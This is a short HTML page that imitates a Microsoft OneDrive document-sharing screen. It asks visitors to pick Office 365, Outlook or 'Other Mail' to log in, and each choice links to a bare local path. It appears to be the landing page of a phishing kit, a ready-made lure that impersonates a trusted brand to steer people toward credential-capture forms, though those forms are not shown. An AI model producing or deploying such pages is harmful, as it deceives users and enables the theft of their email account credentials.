<!DOCTYPE html>
<html >
<head>
<meta charset="UTF-8">
<title>One Drive Cloud Document Sharing</title>
<link rel='stylesheet prefetch' href='https://fonts.googleapis.com/css?family=Open+Sans:600'>
<link rel="stylesheet" href="css/style.css">
<link rel="shortcut icon" href="images/odbfavicon.ico" type="image/vnd.microsoft.icon" id="favicon" />
</head>

<body>
<div class="login-wrap">
  <div class="login-html">
	  <div class="LogoOne"></div>
	   <div class="foot-lnk">Select your email provider below to access your files. </div>
    <!--<div class="top"></div>-->
    <!--<input id="tab-1" type="radio" name="tab" class="sign-in" checked><label for="tab-1" class="tab">Sign In</label>
		<input id="tab-2" type="radio" name="tab" class="sign-up"><label for="tab-2" class="tab">Sign Up</label>-->
    <div class="login-form">
      <div class="sign-in-htm">
        <div class="group">
          <div class="btn-3 loginBtn loginBtn--office"><a href="o1">Login with Office 365</a></div>
        </div>
        <div class="group">
          <div class="btn-3 loginBtn loginBtn--outlook"><a href="o4">Login with Outlook</a></div>
        </div>
        <div class="group">
          <div class="btn-3 loginBtn loginBtn--other"><a href="o6">Login with Other Mail</a></div>
        </div>
        <!--<div class="hr"></div>-->
        <div class="foot-lnk">Get to all your files from anywhere on any device, and share them with anyone. <br>One Drive. </div>
      </div>
    </div>
  </div>
</div>
<!--</div>-->
</body>
</html>
